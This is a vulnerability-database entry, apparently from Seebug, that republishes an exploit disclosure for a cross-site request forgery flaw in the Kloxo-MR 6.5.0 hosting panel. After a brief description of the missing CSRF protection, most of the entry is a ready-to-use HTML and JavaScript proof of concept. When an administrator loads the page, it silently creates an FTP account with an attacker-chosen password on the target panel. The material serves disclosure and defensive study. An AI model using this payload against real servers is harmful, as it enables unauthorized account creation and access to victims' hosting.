Kloxo-MR 6.5.0 - CSRF Vulnerability

2014-07-01T00:00:00
ID SSV:85945
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title		:Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage	:https://github.com/mustafaramadhan/kloxo/tree/dev
# Version	:Kloxo-MR 6.5.0.f-2014020301
# Tested on			:Centos 6.4
# Exploit Author	:Necmettin COSKUN =>@babayarisi
# Blog				:http://www.ncoskun.com http://www.grisapka.org
# Discovery date	:03/12/2014
# CVE				:N/A
 
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
 
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.

Poc Exploit
================

 <html>
 <head><title>Kloxo-MR demo</title></head>
 <script type="text/javascript">
 function yurudi(){
		///////////////////////////////////////////////////////////
		//Kloxo-MR 6.5.0  CSRF Vulnerability		 //	
		//Author:Necmettin COSKUN => twitter.com/@babayarisi	 //
		//Blog: http://www.ncoskun.com | http://www.grisapka.org //
		///////////////////////////////////////////////////////////
		//Remote host
		var host="victim.com";	
		//New Ftp Username
		var username="demouser";
		//New Ftp Password
		var pass="12345678";
		//This creates new folder under admin dir. /admin/yourfolder
		var dir="demodirectory";
		//If necessary only modify http to https ;)
		var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";

		document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
 
 
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!